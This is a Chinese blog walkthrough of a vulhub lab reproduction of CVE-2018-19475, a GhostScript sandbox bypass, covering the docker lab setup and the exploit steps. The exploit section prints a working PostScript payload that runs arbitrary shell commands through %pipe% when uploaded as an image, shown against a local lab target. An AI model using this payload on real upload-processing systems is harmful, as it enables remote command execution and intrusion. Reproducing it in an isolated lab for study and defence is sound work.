[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475

博主介绍

‍ 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
点赞➕评论➕收藏 == 养成习惯(一键三连)
欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋
作者水平有限,欢迎各位大佬指点,相互学习进步!

文章目录

  • 博主介绍
  • 一、漏洞编号
  • 二、影响范围
  • 三、漏洞描述
  • 四、环境搭建
    • 1、进入CVE-2018-19475环境
    • 2、启动CVE-2018-19475环境
    • 3、查看CVE-2018-19475环境
    • 4、访问CVE-2018-19475环境
    • 5、查看CVE-2018-19475漏洞提示信息
    • 6、关闭CVE-2018-19475环境
  • 五、漏洞复现
    • 1、POC
    • 2、构造命令执行ls
    • 3、上传poc.png
    • 4、命令执行成功
  • 六、相关资源

一、漏洞编号

CVE-2018-19475

二、影响范围

Ghostscript 9.26之前版本

三、漏洞描述

Ghostscript 是一套基于 Adobe、PostScript 及可移植文档格式(PDF)的页面描述语言等而编译成的免费软件。Ghostscript 可以查看及打印 PS、EPS、PDF 文件,支持 PS 的绘图程序一般都很大。以Postscript和PDF阅览器使用的栅格化影像处理器RIP引擎,GhostScript 被许多图片处理库所使用。在文件上传过程中,有可能会用GhostScript来处理图片。
CVE-2018-19475是CVE-2018-16509的变体,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。

四、环境搭建

1、进入CVE-2018-19475环境

cd vulhub/ghostscript/CVE-2018-19475

在这里插入图片描述

2、启动CVE-2018-19475环境

docker-compose up -d

[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475_第1张图片

3、查看CVE-2018-19475环境

docker-compose ps

在这里插入图片描述

4、访问CVE-2018-19475环境

访问ip+端口

http://192.168.233.128:8080/

[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475_第2张图片

5、查看CVE-2018-19475漏洞提示信息

cat README.md

[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475_第3张图片

6、关闭CVE-2018-19475环境

复现完记得关闭环境

docker-compose down

在这里插入图片描述

五、漏洞复现

1、POC

%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%命令 > /tmp/success && cat /tmp/success) (w) file

2、构造命令执行ls

%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%ls > /tmp/success && cat /tmp/success) (w) file

[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475_第4张图片

[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475_第5张图片

3、上传poc.png

[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475_第6张图片

4、命令执行成功

回显出ls信息,命令执行成功。

[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475_第7张图片

六、相关资源

1、docker 搭建 vulhub 靶场环境
2、[ vulhub漏洞复现篇 ] vulhub 漏洞集合 - 表格版本(含漏洞复现文章连接)
3、[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)

你可能感兴趣的:(轮播展示专栏,vulhub漏洞复现,GhostScript,任意命令执行,CVE-2018-19475,渗透测试)